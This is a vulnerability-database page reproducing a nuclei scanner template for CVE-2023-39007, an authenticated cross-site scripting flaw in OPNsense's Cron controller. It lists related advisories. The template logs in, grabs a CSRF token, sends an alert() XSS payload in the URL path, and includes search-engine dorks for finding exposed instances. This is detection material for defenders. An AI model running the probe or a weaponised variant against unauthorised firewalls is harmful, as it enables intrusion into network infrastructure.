Lucene search
K

OPNsense - Cross-Site Scripting to RCE

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 91 Views

OPNsense Cron component XSS to RCE via openAction in the Cron controlle

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-39007
9 Aug 202319:15
attackerkb
Circl
CVE-2023-39007
9 Aug 202322:15
circl
CNNVD
Deciso OPNsense Cross-Site Scripting Vulnerability
9 Aug 202300:00
cnnvd
CVE
CVE-2023-39007
9 Aug 202300:00
cve
Cvelist
CVE-2023-39007
9 Aug 202300:00
cvelist
NCSC
Vulnerabilities fixed in OPNSense
11 Aug 202300:00
ncsc
NVD
CVE-2023-39007
9 Aug 202319:15
nvd
Prion
Design/Logic Flaw
9 Aug 202319:15
prion
Positive Technologies
PT-2023-26733 · Opnsense · Opnsense Community Edition +1
9 Aug 202300:00
ptsecurity
Vulnrichment
CVE-2023-39007
9 Aug 202300:00
vulnrichment
Rows per page
id: CVE-2023-39007

info:
  name: OPNsense - Cross-Site Scripting to RCE
  author: ritikchaddha
  severity: critical
  description: |
    There is a XSS in /ui/cron/item/open in the Cron component of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 via openAction in app/controllers/OPNsense/Cron/ItemController.php.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the Cron item opening functionality, potentially escalating to remote code execution and compromising the entire firewall/router system and network security.
  remediation: |
    Update OPNsense Community Edition to version 23.7 or later, or Business Edition to version 23.4.2 or later that properly sanitizes input in the Cron ItemController.
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39007
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2023-39007
    cwe-id: CWE-79
    epss-score: 0.02315
    epss-percentile: 0.81333
    cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: opnsense
    product: opnsense
    shodan-query:
      - title:"OPNsense"
      - http.title:"opnsense"
    fofa-query: title="opnsense"
    google-query: intitle:"opnsense"
  tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1

      - |
        GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "openDialog('0'+alert(document.domain)+''"

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: para
        part: body
        group: 1
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true

      - type: regex
        name: value
        part: body
        group: 2
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true
# digest: 4b0a00483046022100a03294d7c6dae765ab1cb9bc955c16b0a1b67c7dc65bdd6574aa7592d08ce74b022100886aae0e20cec54899eb0ac1b79019fb93fe647b39b230724e1f53c99df1c193:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.6
EPSS0.02315
SSVC
91